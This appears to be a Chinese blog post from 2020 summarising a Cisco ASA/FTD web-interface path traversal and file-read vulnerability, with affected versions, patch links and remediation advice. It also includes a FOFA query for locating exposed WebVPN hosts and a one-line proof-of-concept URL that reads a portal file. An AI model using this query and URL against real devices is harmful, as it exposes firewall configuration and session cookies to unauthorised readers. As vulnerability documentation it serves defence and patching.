CISCO ASA远程任意文件读取

CISCO ASA远程任意文件读取

0X00简介

Cisco Adaptive Security Appliance (ASA)是思科的一种防火墙设备。

0X01漏洞概述

Cisco Adaptive Security Appliance (ASA)防火墙设备以及Cisco Firepower Threat Defense (FTD)设备的web管理界面存在未授权的目录穿越漏洞和远程任意文件读取漏洞。攻击者只能查看web目录下的文件,无法通过该漏洞访问web目录之外的文件。该漏洞可以查看webVpn设备的配置信息,cookies等。

0X02影响版本

Cisco ASA 设备影响版本:

  1. <9.6.1
  2. 9.6 < 9.6.4.42
  3. 9.71
  4. 9.8 < 9.8.4.20
  5. 9.9 < 9.9.2.74
  6. 9.10 < 9.10.1.42
  7. 9.12 < 9.12.3.12
  8. 9.13 < 9.13.1.10
  9. 9.14 < 9.14.1.10

Cisco FTD设备影响版本:

  1. 6.2.2
  2. 6.2.3 < 6.2.3.16
  3. 6.3.0 < Migrate to 6.4.0.9 + Hot Fix or to 6.6.0.1
  4. 6.4.0 < 6.4.0.9 + Hot Fix
  5. 6.5.0 < Migrate to 6.6.0.1 or 6.5.0.4 + Hot Fix (August 2020)
  6. 6.6.0 < 6.6.0.1

0X03漏洞复现

FOFA检索规则
FOFA: “webVpn”

Poc为https://<domain>/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../

标红为读取的文件名

0X04漏洞修复

安装Cisco ASA/TFD 最新补丁,进行补丁升级。

具体可以参考:https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86

0X05参考连接

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86

https://twitter.com/aboul3la/status/1286809567989575685

 

 

posted @ 2020-08-21 10:17  L0ading  阅读(1518)  评论(0编辑  收藏  举报